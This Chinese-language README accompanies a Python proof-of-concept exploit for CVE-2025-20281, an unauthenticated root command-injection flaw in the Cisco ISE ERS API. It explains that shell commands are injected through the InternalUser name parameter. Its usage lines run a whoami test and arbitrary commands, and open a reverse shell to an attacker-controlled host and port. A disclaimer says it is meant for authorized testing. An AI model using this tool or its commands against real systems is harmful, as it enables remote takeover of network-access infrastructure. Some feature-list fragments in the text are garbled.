本仓库包含一个针对 CVE-2025-20281 的 Python 3 概念验证漏洞利用工具,该漏洞是 Cisco Identity Services Engine (ISE) 中的一个严重漏洞,允许通过 ERS API 实现无需认证的 root 权限远程代码执行 (RCE)。
Cisco ISE ERS 的
/ers/sdk#_端点在处理用户创建请求时未能验证身份验证。
攻击者可通过在InternalUser对象的name参数中注入 shell 命令,实现以 root 身份执行命令。
--cmd)--whoami 快速测试--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
测试命令:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
运行自定义命令:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
反弹 shell:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ 法律免责声明
此代码仅用于教育和授权的测试目的。 请勿针对您未拥有或未经许可测试的网络或系统使用本软件。
漏洞:由 Cisco 安全公告披露
PoC 重构:illdeed